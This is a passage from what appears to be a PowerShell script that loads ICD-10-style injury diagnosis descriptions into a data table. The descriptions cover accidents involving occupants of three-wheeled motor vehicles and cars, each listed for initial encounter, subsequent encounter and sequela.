vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with other nonmotor vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with other nonmotor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with other nonmotor vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with other nonmotor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with other nonmotor vehicle","Person boarding or alighting a three-wheeled motor vehicle injured in collision with other nonmotor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Driver of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with fixed or stationary object","Person boarding or alighting a three-wheeled motor vehicle injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with fixed or stationary object","Person boarding or alighting a three-wheeled motor vehicle injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in collision with fixed or stationary object","Person boarding or alighting a three-wheeled motor vehicle injured in collision with fixed or stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Driver of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Person on outside of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Driver of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Driver of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Driver of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Passenger in three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Passenger in three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Passenger in three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in noncollision transport accident","Person boarding or alighting a three-wheeled motor vehicle injured in noncollision transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in noncollision transport accident","Person boarding or alighting a three-wheeled motor vehicle injured in noncollision transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a three-wheeled motor vehicle injured in noncollision transport accident","Person boarding or alighting a three-wheeled motor vehicle injured in noncollision transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Driver of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Driver of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Driver of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Passenger in three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Passenger in three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Passenger in three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Person on outside of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified nontraffic accident","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified nontraffic accident","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified nontraffic accident","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Driver of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Driver of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Passenger in three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident","Unspecified occupant of three-wheeled motor vehicle injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in transport accident with military vehicle","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in transport accident with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in transport accident with military vehicle","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in transport accident with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in transport accident with military vehicle","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in transport accident with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in other specified transport accidents","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in other specified transport accidents","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in other specified transport accidents","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified traffic accident","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified traffic accident","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified traffic accident","Occupant (driver) (passenger) of three-wheeled motor vehicle injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedestrian or animal in nontraffic accident","Car driver injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedestrian or animal in nontraffic accident","Car driver injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedestrian or animal in nontraffic accident","Car driver injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedestrian or animal in nontraffic accident","Car passenger injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedestrian or animal in nontraffic accident","Car passenger injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedestrian or animal in nontraffic accident","Car passenger injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedestrian or animal in nontraffic accident","Person on outside of car injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedestrian or animal in nontraffic accident","Person on outside of car injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedestrian or animal in nontraffic accident","Person on outside of car injured in collision with pedestrian 